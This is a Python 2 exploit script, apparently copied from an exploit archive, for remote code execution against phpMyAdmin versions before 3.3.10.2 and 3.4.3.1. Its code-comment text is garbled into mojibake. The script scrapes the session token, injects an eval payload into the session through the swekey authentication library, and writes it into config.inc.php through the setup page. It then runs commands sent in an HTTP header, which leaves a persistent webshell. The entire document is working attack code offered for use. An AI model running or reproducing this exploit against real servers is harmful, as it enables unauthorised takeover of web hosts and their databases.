usr bin env python coding utf-8 import os sys urllib2 re def usage pro

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/usr/bin/env python
# coding=utf-8
import os,sys,urllib2,re
def usage(program):
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote codeexecute exploit"
print "Usage: %s <PMA_url>" % program
print "Example: %s http://www.test.com/phpMyAdmin" % program
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
if args[1][-1] == "/":
args[1] = args[1][:-1]
# ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�
print "[+] Trying get form token&session_id.."
content = urllib2.urlopen(args[1]+"/index.php").read()
r1 = re.findall("token=(\w{32})", content)
r2 = re.findall("phpMyAdmin=(\w{32,40})", content)
if not r1:
r1 = re.findall("token\" value=\"(\w{32})\"", content)
if not r2:
r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)
if len(r1) < 1 or len(r2) < 1:
print "[-] Cannot find form token and session id...exit."
sys.exit(-1)
token = r1[0]
sessionid = r2[0]
print "[+] Token: %s , SessionID: %s" % (token, sessionid)
# �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ
print "[+] Trying to insert payload in $_SESSION.."
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"
url = args[1]+uri
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % (sessionid, sessionid)))
urllib2.install_opener(opener)
urllib2.urlopen(url)
# ����setup��ȡshell
print "[+] Trying get webshell.."
postdata = "phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save" % (sessionid, token)
url = args[1]+"/setup/config.php"
# print "[+]Postdata: %s" % postdata
urllib2.urlopen(url, postdata)
print "[+] All done, pray for your lucky!"
# ���IJ����������shell
url = args[1]+"/config/config.inc.php"
opener.addheaders.append(('Code', 'phpinfo();'))
urllib2.install_opener(opener)
print "[+] Trying connect shell: %s" % url
result = re.findall("System \</td\>\<tdclass=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())
if len(result) == 1:
print "[+] Lucky u! System info: %s" % result[0]
print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"
else:
print "[-] Cannot get webshell."
except Exception, e:
print e
if __name__ == "__main__" : main(sys.argv)